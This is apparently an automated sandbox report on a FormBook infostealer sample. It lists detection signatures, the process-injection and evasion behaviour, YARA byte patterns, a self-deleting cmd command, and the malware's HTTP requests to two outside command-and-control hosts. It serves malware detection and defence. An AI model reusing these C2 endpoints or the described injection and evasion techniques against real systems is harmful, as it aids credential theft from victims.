Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report emthree.exe

Overview

General Information

Sample Name:emthree.exe
Analysis ID:323574
MD5:25b5788669a3a8f35596ce975f0823a7
SHA1:77e07883f131f342e3d24954ea348d25554440a1
SHA256:f3024d8a77f7d80b8e1f44a868913ad76e926d5add36cdc27332c42c3cc012a3
Tags:PEP

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Binary contains a suspicious time stamp
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • emthree.exe (PID: 4600 cmdline: 'C:\Users\user\Desktop\emthree.exe' MD5: 25B5788669A3A8F35596CE975F0823A7)
    • emthree.exe (PID: 5772 cmdline: {path} MD5: 25B5788669A3A8F35596CE975F0823A7)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6240 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6256 cmdline: /c del 'C:\Users\user\Desktop\emthree.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.emthree.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.emthree.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.emthree.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
        1.2.emthree.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.emthree.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: emthree.exeAvira: detected
          Multi AV Scanner detection for submitted fileShow sources
          Source: emthree.exeMetadefender: Detection: 35%Perma Link
          Source: emthree.exeReversingLabs: Detection: 64%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: emthree.exeJoe Sandbox ML: detected
          Source: 1.2.emthree.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: global trafficHTTP traffic detected: GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1Host: www.porncamslivechat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1Host: www.amarilloautoexpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: EGIHOSTINGUS EGIHOSTINGUS
          Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
          Source: C:\Windows\explorer.exeCode function: 2_2_06D527A2 getaddrinfo,setsockopt,recv,
          Source: global trafficHTTP traffic detected: GET /unx5/?YBZpk4k0=aP/H6rv5dFlIxT1BkbsZYq0qqc+q/KR6FDazEtWbPmCTekqgSoQQ9LKqFpQ/1cw8Q+Tu&Wt=LhnLHro0q HTTP/1.1Host: www.porncamslivechat.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /unx5/?YBZpk4k0=1w0hMOl97180k8Du4bGC2gk65X6wFt6LICq9bRyB5mmRHYVxdYOusOKtXf2j62HHiftJ&Wt=LhnLHro0q HTTP/1.1Host: www.amarilloautoexpress.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.asojebu.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 Nov 2020 05:37:46 GMTServer: ApacheLink: <https://porncamslivechat.com/wp-json/>; rel="https://api.w.org/"Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=1d6c5c8d17388afcc8a5932da9c3f004; path=/Upgrade: h2,h2cConnection: Upgrade, closeReferrer-Policy: no-referrer-when-downgradeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 33 64 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 69 6d 61 67 65 73 2f 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 32 66 36 38 32 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 70 72 6f 2d 63 61 6d 2d 6d 75 2f 6a 73 2f 68 74 6d 6c 35 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 6f 72 6e 63 61 6d 73 6c 69 76 65 63 68 61 74 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 63 61 63 68 65 2f 6d 69 6e 69 66 79 2f 62 66 66 64 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 33 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: emthree.exe, 00000000.00000002.239603549.0000000003530000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: emthree.exe, 00000000.00000002.238970430.00000000019F7000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comu
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: emthree.exe, 00000000.00000002.243864150.0000000007352000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.262419309.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: emthree.exe, 00000000.00000002.238716419.00000000016B0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.275755986.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.489611416.0000000002D90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.276071726.0000000000AB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.240137106.00000000044F1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.489786032.0000000003040000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.276033379.0000000000A50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.488444370.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.emthree.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.emthree.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041A070 NtClose,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041A120 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00419F40 NtCreateFile,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_00419FF0 NtReadFile,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041A06B NtClose,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0041A03A NtReadFile,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010295D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010299D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0102B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_010298A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_0102A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029A10 NtQuerySection,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\emthree.exeCode function: 1_2_01029520 NtWaitForSingleObject,
